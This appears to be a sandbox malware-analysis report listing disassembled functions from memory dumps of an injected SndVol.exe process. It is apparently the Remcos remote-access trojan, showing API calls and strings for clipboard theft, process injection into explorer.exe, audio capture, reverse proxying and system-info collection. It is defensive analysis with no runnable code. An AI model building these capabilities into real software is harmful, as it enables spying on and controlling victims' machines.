Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 838864fbe780a5b53efaeb99f32d7b90f09ad3a43690ad1c97a9b89e05aab49e
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: 838864fbe780a5b53efaeb99f32d7b90f09ad3a43690ad1c97a9b89e05aab49e
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Function 0535616D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0535618C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0535623C
TranslateMessage.USER32(?), ref: 0535624B
DispatchMessageA.USER32(?), ref: 05356256
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 0535630E
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 05356346

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

Strings

DisplayMessage, xrefs: 053562B9
CloseChat, xrefs: 053562D6
GetMessage, xrefs: 053562C5

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
Instruction ID: 35142837ee532aca139d5c62501378d003f6b7636de54b7d8706f4cc7f674816
Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
Instruction Fuzzy Hash: 7741CE35704300ABCB14FB74DD5DC6F37A9AB85620F805A2CFD5293194EF3499058796

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalLock.KERNEL32(00000000), ref: 00416975
GlobalUnlock.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID: !D@
API String ID: 2172192267-604454484
Opcode ID: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 379e7e26ad6a900c3167f358ae85a18f925cef018a940f3467d8a5dc77bbddf2
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Function 05363781 Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 482fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0536379A

Part of subcall function 0536C645: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,05354D49), ref: 0536C66C

Part of subcall function 05369235: CloseHandle.KERNEL32(05354DC2,?,?,05354DC2,00465E74), ref: 0536924B
Part of subcall function 05369235: CloseHandle.KERNEL32(t^F,?,?,05354DC2,00465E74), ref: 05369254

DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363A92
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363AC9
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 05363B05

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

Strings

0TG, xrefs: 05363E19
NG, xrefs: 05363C39
0TG, xrefs: 05363CF3
NG, xrefs: 05363D8E

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: 0TG$0TG$NG$NG
API String ID: 1937857116-278358599
Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction ID: 93eab5d65f0aa70307e982e60fe89289218c4b66dc955d1f7d17de1640ed77ee
Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction Fuzzy Hash: 340272357083859AD328FB30D898FEFB3E5BF94260F419D2DA88A43195EF705A49C752

Function 00419FB4 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00419FB9
GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
Sleep.KERNEL32(000003E8), ref: 0041A0FD
GetLocalTime.KERNEL32(?), ref: 0041A105
Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09F
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041A09A, 0041A0BB, 0041A129

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 489098229-3790400642
Opcode ID: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
Opcode Fuzzy Hash: 8e408b2f37b5a40c6075e10aa462efa04368c9b3309c0ae95edff302c11cc8c3
Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799

Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27

Strings

asin, xrefs: 00456093
pow, xrefs: 0045600B, 004560B7, 004560CA
log10, xrefs: 00455F71, 00455FC1
sqrt, xrefs: 004560AB
exp, xrefs: 00455FEC, 0045604E
acos, xrefs: 0045609F
log, xrefs: 00455FCD, 00455FD9

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E

Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E

Sleep.KERNEL32(00000064), ref: 00417521
DeleteFileW.KERNEL32(00000000), ref: 00417555

Strings

open, xrefs: 004174EF
temp, xrefs: 004174A5
dxdiag, xrefs: 004174EA
\sysinfo.txt, xrefs: 004174A0
/t , xrefs: 004174D4

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 60ec126b7efeb2c5ea8106309d38696043060de21bd14a496d46bc656db954b1
Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
Opcode Fuzzy Hash: 60ec126b7efeb2c5ea8106309d38696043060de21bd14a496d46bc656db954b1
Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C

Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\SysWOW64\SndVol.exe), ref: 0040749E

Strings

[-] NtAllocateVirtualMemory Error, xrefs: 0040743D
explorer.exe, xrefs: 00407450, 0040747B
windir, xrefs: 004073EA
PEB: %x, xrefs: 004074AF
\explorer.exe, xrefs: 00407400
[+] NtAllocateVirtualMemory Success, xrefs: 00407410

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
API String ID: 2050909247-4242073005
Opcode ID: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
Opcode Fuzzy Hash: 88d96bdeb6b72da8395a6a381538ab2c2cfec8ecedfcfbbcc0bb0a9da71bdbb1
Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F

Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
int.LIBCPMT ref: 00410E81

Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC

std::_Facet_Register.LIBCPMT ref: 00410EC1
std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
__CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
__Init_thread_footer.LIBCMT ref: 00410F29

Strings

0kG, xrefs: 00410F31
,kG, xrefs: 00410F04

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG
API String ID: 3815856325-2015055088
Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D

Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476

Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
TranslateMessage.USER32(?), ref: 0041D4E9
DispatchMessageA.USER32(?), ref: 0041D4F3
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500

Strings

Remcos, xrefs: 0041D4B8

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98

Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69

Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

_memcmp.LIBVCRUNTIME ref: 00445423
_free.LIBCMT ref: 00445494
_free.LIBCMT ref: 004454AD
_free.LIBCMT ref: 004454DF
_free.LIBCMT ref: 004454E8
_free.LIBCMT ref: 004454F4

Strings

C, xrefs: 004452E1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44

Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON

Download Yara Rule

Strings

tcp, xrefs: 00414A73
udp, xrefs: 00414A46

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: tcp$udp
API String ID: 0-3725065008
Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A

Function 004114F5 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(8BE5AF6B), ref: 004115AF

Strings

StartForward, xrefs: 00411673
StartReverse, xrefs: 0041167F
StopForward, xrefs: 00411690
GetDirectListeningPort, xrefs: 004116B2
StopReverse, xrefs: 004116A1

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: 2dd3174c07bbe831fe7fa785b7657b438f9445197bc78ef94a849af592049410
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: 2dd3174c07bbe831fe7fa785b7657b438f9445197bc78ef94a849af592049410
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Function 05355595 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144networkCOMMON

Download Yara Rule

APIs

connect.WS2_32(FFFFFFFF,00000000,00000000), ref: 053555AD
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 053556CD
CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 053556DB
WSAGetLastError.WS2_32 ref: 053556EE

Part of subcall function 0536C1BC: GetLocalTime.KERNEL32(00000000), ref: 0536C1D6

Strings

Connection Failed: , xrefs: 05355710
PkGNG, xrefs: 05355595
TLS Handshake... | , xrefs: 053555D1

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastLocalTimeconnect
String ID: Connection Failed: $PkGNG$TLS Handshake... |
API String ID: 994465650-2799020840
Opcode ID: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction ID: 164e5f6f38cf43623ee92ab18c2b989cebdc3a7c9dfceb44c6f11827bada1a64
Opcode Fuzzy Hash: 544a8dfd755885537e58458bfc18e92728dddd0fb449b18b6c8fe8c32441fe06
Instruction Fuzzy Hash: 96410675F00609ABCB18B779895ED3E7A66BB42220F40611EEC0247A95EE61FC2487D7

Function 05352537 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0535258B
RtlExitUserThread.NTDLL(00000000), ref: 053525C3
waveInUnprepareHeader.WINMM(00001E40,00000020,00000000,?,00000020,00474EE0,00000000), ref: 053526D1

Part of subcall function 0538543D: __onexit.LIBCMT ref: 05385443

Strings

XMG, xrefs: 053525CF
NG, xrefs: 0535265D
PkG, xrefs: 05352555
NG, xrefs: 053525DA

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepareUser__onexitwave
String ID: PkG$XMG$NG$NG
API String ID: 1265842484-3151166067
Opcode ID: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
Instruction ID: a9356d850bad90855c6a71003deb3398a5b1b5a1c7fbd6f36c9a1f0f06951006
Opcode Fuzzy Hash: 81a4b8ea1a2a8dd188103dc24f06caf07ba89953b00c1715f800357eb9072b97
Instruction Fuzzy Hash: 32419E357042109BC328EB24ED98EBF73A6AB85360F01592DF84A961A1DF30694AC756

Function 00417CDF Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

Strings

<, xrefs: 00417D83
@, xrefs: 00417D8A
Temp, xrefs: 00417D00

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: 62621946d8eb1aa2ce2b39a4af5520ae479f7c91f66b5ded83c662c0635c4b6b
